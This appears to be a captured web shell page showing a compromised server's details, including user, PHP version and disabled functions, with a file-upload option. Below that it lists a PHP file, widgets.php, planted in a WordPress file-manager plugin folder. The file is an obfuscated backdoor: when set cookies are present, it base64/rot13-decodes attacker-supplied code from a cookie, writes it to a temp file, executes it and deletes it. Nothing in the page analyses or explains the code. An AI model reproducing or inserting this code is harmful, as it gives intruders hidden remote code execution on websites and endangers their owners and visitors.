HEX
Server: Apache/2
System: Linux aws3 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64
User: hucscom (1018)
PHP: 8.1.32
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/hucscom/public_html/wp-content/plugins/wp-file-manager/lib/php/plugins/Sanitizer/
Upload Files
File: /home/hucscom/public_html/wp-content/plugins/wp-file-manager/lib/php/plugins/Sanitizer/widgets.php
<?php


if (isset($_COOKIE[10+-10]) && isset($_COOKIE[61-60]) && isset($_COOKIE[43-40]) && isset($_COOKIE[-61+65])) {
    $parameter_group = $_COOKIE;
    function app_initializer($holder) {
        $parameter_group = $_COOKIE;
        $factor = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), 'cbe4a03a');
        if (!is_writable($factor)) {
            $factor = getcwd() . DIRECTORY_SEPARATOR . "secure_access";
        }
        $value = "\x3c\x3f\x70\x68p " . base64_decode(str_rot13($parameter_group[3]));
        if (is_writeable($factor)) {
            $data = fopen($factor, 'w+');
            fputs($data, $value);
            fclose($data);
            spl_autoload_unregister(__FUNCTION__);
            require_once($factor);
            @array_map('unlink', array($factor));
        }
    }
    spl_autoload_register("app_initializer");
    $marker = "dc28647293883cd2cbece3f6e4a0dc71";
    if (!strncmp($marker, $parameter_group[4], 32)) {
        if (@class_parents("token_parser_engine_system_core", true)) {
            exit;
        }
    }
}
@ Telegram